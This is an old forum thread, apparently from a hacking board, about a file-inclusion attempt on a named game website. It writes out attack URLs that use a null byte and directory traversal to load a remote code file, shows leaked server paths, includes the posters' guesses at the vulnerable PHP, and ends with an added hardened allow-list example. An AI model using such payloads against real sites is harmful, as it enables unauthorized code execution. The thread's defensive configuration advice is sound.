[File Inclusion] Eternia Games

10/15/2012 17:40 WarmongerR7#1
Here to show you a little exploit on Eternia's website that would almost allow you to execute any of your own scripts under web server privileges (a shell or whatever) with ease. This is only to show you why you should always turn allow_url_fopen off in your php configuration.

Code:
http://lastchaos.eterniagames.com/s_ep3/?lang=http://site.com/code.txt%00
Which gives us a result of.

Code:
Warning: require(_cache/lang.http://site.com/code.txt) [function.require]: failed to open stream: No such file or directory in /var/www/vhosts/eterniagames.com/subdomains/lastchaos/httpdocs/s_ep3/index.config.php on line 514
If the server permitted traversal we could simply do the following to jump down two directories.

Code:
http://lastchaos.eterniagames.com/s_ep3/?lang=..%2f..%2fhttp://site.com/code.txt%00
And inject our own code into the site. This is for learning purposes only. I suggest not attacking random servers thinking this is going to work, because it won't. This just goes to show some of the biggest servers aren't always the securest.
10/15/2012 19:58 FapMax#2
This Website "Error" is totally worth it you are WRONG. You can't inject anything there.

The Source looks like this :
PHP Code:
require('lang.' . $_GET['lang'] . '.php');
Your Injection Point :
PHP Code:
require('lang.INJECTION.php');
You can't paste any Code in there. There is no way to Request other Files except the Files on their own FTP called "lang." at the start.
I found this before but it does not give any vulnerable point, that's why I didn't post it, anyway good work for the Start.
10/15/2012 20:24 WarmongerR8#3
Quote:
Originally Posted by FapMax
This Website "Error" is totally worth it you are WRONG. You can't inject anything there.

The Source looks like this :
PHP Code:
require('lang.' . $_GET['lang'] . '.php');
Your Injection Point :
PHP Code:
require('lang.INJECTION.php');
You can't paste any Code in there. There is no way to Request other Files except the Files on their own FTP called "lang." at the start.
I found this before but it does not give any vulnerable point, that's why I didn't post it, anyway good work for the Start.
You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to set up server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:
require(_cache/lang.<injection point>%00);
Also the server side code most likely looks like this.

Code:
require($_GET['cache'] . $_GET['lang'] . '.php');
If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.
10/15/2012 20:30 Wayne...?#4
Oh Nooo WarmongerR7 Are Banned now WarmongerR8 :facepalm:

This generation will never End :facepalm:
10/15/2012 22:01 FapMax#5
Quote:
Originally Posted by WarmongerR8
You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to set up server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:
require(_cache/lang.<injection point>%00);
Also the server side code most likely looks like this.

Code:
require($_GET['cache'] . $_GET['lang'] . '.php');
If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.
Retard, I loled : "$_GET['cache']" xD
Read [Only registered and activated users can see links. Click Here To Register...] please.
10/15/2012 22:09 WarmongerR8#6
Quote:
Originally Posted by FapMax
Retard, I loled : "$_GET['cache']" xD
Read [Only registered and activated users can see links. Click Here To Register...] please.

PS: Enjoy your Ban.
My bad, drunk and high. :bandit: Here is what it should look like.

Code:
require($settings['cache'] . $_GET['lang'] . '.php');
Again, if you have any questions feel free to ask.

Quote:
Originally Posted by FapMax

PS: Enjoy your Ban.
I'll be here forever, to teach kiddies like you.
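
A hardened form of the include debated in this thread, as an added example that is not part of any post and is not the site's actual code: the `lang` value is only compared against a fixed allow-list and never reaches `require` unchecked. The `lang_file` helper, the allow-list contents and the default language are assumptions; `_cache/lang.` is the prefix visible in the warning message.

```php
<?php
// Added example: helper name, allow-list and default are assumptions.
// php.ini settings that disable URL wrappers in file functions and in
// include/require:
//   allow_url_fopen = Off
//   allow_url_include = Off

const LANG_DIR     = '_cache';             // prefix shown in the warning message
const LANG_ALLOWED = ['en', 'de', 'fr'];   // constructed allow-list
const LANG_DEFAULT = 'en';

// Return the include path for a language code. The request value is only
// compared against the allow-list; anything else falls back to the default.
function lang_file($input)
{
    // ?lang[]=x arrives as an array, so check the type before comparing.
    if (!is_string($input) || !in_array($input, LANG_ALLOWED, true)) {
        $input = LANG_DEFAULT;             // URLs, "../" and NUL bytes end up here
    }
    return LANG_DIR . '/lang.' . $input . '.php';
}

// Constructed inputs: a valid code, the two values from the first post
// after URL decoding, and an array parameter.
$samples = [
    'de',
    "http://site.com/code.txt\0",
    "../../http://site.com/code.txt\0",
    ['de'],
];

foreach ($samples as $value) {
    printf("%s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), lang_file($value));
}

// In the page itself the call would be:
//   require lang_file($_GET['lang'] ?? null);
```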